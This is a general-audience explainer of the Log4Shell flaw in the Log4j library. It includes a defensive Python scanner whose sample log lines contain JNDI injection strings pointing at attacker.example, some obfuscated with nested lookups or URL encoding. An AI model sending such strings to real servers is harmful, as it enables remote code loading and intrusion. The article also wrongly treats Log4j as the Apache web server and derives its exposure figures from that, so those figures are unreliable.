What is the Log4j error and how does it affect you?


A large number of cyber attacks are exploiting a dangerous bug called Log4Shell in the Log4j software. A top US cybersecurity official, quoted by Cyberscope, said it is one of the most serious attacks of her career, “if not the most serious.” Here’s what makes it so bad – and how it affects you.

What is Log4j?

The Log4j error (also known as the Log4Shell vulnerability, tracked as CVE-2021-44228) is a vulnerability in some of the most widely used web server software, Apache. The bug is found in the open source Log4j library, a collection of ready-made code that programmers use to speed up their work and avoid rewriting complicated code.

Libraries are the basis of many, if not most, programs because they are great time savers. Instead of typing out an entire block of code over and over again for specific tasks, you just type a few commands that tell the program to grab something from a library. Think of them as shortcuts you can put in your code.

But if something goes wrong, as it has in the Log4j library, every program that uses that library is affected. That would be serious in itself, but Apache runs on many servers, and we mean a lot. W3Techs estimates that 31.5 percent of sites use Apache, and BuiltWith claims to know of more than 52 million sites that use it.

How the Log4j error works

Potentially many servers have this bug, but it gets worse: the Log4j error works by letting an attacker supply a single text string (a line of code) that causes the server to load data from another computer on the Internet.

A halfway decent hacker can feed the Log4j library a line of code that tells a server to retrieve data from another server owned by the hacker. That data can be anything: a script that collects information about the devices connected to the server (like browser fingerprinting, but worse), or even code that takes control of the server itself.

The only limit is the hacker’s ingenuity; skill hardly comes into it, because the attack is so easy. So far, according to Microsoft, attacker activity has included cryptocurrency mining, data theft and server hijacking.
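The text string described above leaves a trace in a web server’s own logs, which is where defenders start when checking whether a server was probed. The following Python scanner is an added example, not code from this article or from the Log4j project; the function names, the sample log lines and the attacker.example hostname are constructed for illustration. It undoes URL-encoding and the nested-lookup tricks used to disguise the string, then reports every line carrying a JNDI lookup, the mechanism behind CVE-2021-44228.

```python
import re
from urllib.parse import unquote

# Nested lookups that Log4j 2 would resolve to a single character, used to
# hide the literal "${jndi:". Collapsing them lets a plain search work.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^}]*)\}")
# The lookup itself: scheme and the host the vulnerable server would contact.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|nis|nds|corba)://([^}/]+)",
                   re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL-encoding and the nested-lookup tricks above, repeating until
    the string stops changing (bounded so a pathological line cannot loop)."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), new)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return (line_number, scheme, host) for each line carrying a JNDI lookup.
    Each hit marks a server that was probed and a host worth blocking and
    hunting for in outbound connection logs."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed sample access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/c}"',
    '203.0.113.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for n, scheme, host in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {scheme} lookup to {host}")
```

A hit only shows that a lookup string reached the server; whether the server actually fetched anything is answered by its outbound connection logs and by checking the Log4j version in use.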

This bug is a zero-day, which means it was detected and exploited before a patch to fix it was available.

We recommend the Malwarebytes blog’s post on Log4j if you are interested in more technical details.

Log4j’s security impact

The effect of this error is massive: a third of the world’s servers may be affected, including servers belonging to large companies such as Microsoft, as well as Apple’s iCloud and its 850 million users. The gaming platform Steam’s servers are also affected. Even Amazon has servers running on Apache.

It’s not just big companies’ bottom lines that could be damaged, either: lots of smaller companies run Apache on their servers. The damage a hacker can do to a system is bad enough for a multi-billion business, but a small one could be wiped out completely.

Also, because the bug was so widely publicized in an attempt to get everyone to patch it, it has become something of a feeding frenzy. In addition to the usual cryptocurrency miners trying to enslave new networks to speed up their operations, Russian and Chinese hackers are also joining in, according to several experts quoted in the Financial Times (our apologies for the paywall).

The only thing anyone can do now is produce patches that fix the bug and apply them. However, experts already say that it will take years to fully repair all affected systems. Not only do cybersecurity professionals need to find out which systems are affected by the bug, they also need to check each one to see whether it has been hacked and, if so, what the hackers did.

Even after patching, there is a possibility that whatever the hackers left behind is still doing its job, which means servers need to be cleaned and reinstalled. It will be a huge job, and not one that can be done in a day.

How does Log4j affect you?

All of the above may sound like nothing short of a cyber apocalypse, but so far we have only talked about companies, not individuals, which is what most coverage has focused on. But there is also a risk to ordinary people, even if they are not running a server.

As we mentioned, hackers have stolen data from some servers. If the company in question secured the data properly, that should not be too big a problem, because the attackers would still have to decrypt the files, which is no easy task. But if people’s data was stored insecurely, then they have made some hacker’s day.

The data in question can be anything, really: usernames, passwords, or even your address and internet activity (credit card information is usually encrypted, thankfully). While it’s too early to say how bad it will be, it seems that very few people will be able to avoid Log4j’s fallout.
